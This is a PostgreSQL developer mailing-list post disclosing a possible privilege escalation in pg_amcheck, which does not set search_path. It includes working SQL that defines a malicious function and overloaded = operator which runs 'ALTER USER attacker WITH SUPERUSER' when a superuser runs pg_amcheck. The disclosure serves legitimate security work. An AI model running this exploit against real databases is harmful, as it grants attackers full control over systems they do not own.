Thread

  1. Permission elevation by pg_amcheck operator overloading via search_path possible?

    Pavel Borisov <pashkin.elfe@gmail.com> — 2026-05-22T12:39:33Z

    Hi, hackers!
    
    As I see pg_amcheck doesn't set search_path.
    
    It runs SQL queries like:
    SELECT n.nspname, x.extversion FROM pg_catalog.pg_extension x JOIN
    pg_catalog.pg_namespace n ON x.extnamespace = n.oid WHERE x.extname =
    'amcheck'
    
    Let's suppose search_path for database is set:
     search_path = 'myschema, pg_catalog'
    Then
    CREATE FUNCTION myschema.evil(name, name) RETURNS bool AS $$
        ALTER USER attacker WITH SUPERUSER;
        SELECT $1 OPERATOR(pg_catalog.=) $2;
      $$ LANGUAGE sql;
      CREATE OPERATOR myschema.= (LEFTARG = name, RIGHTARG = name,
    PROCEDURE = myschema.evil);
    Then run pg_amcheck as superuser.
    
    So the user attacker can become SUPERUSER.
    
    Is this scenario worth fixing?
    
    Regards,
    Pavel Borisov
    Supabase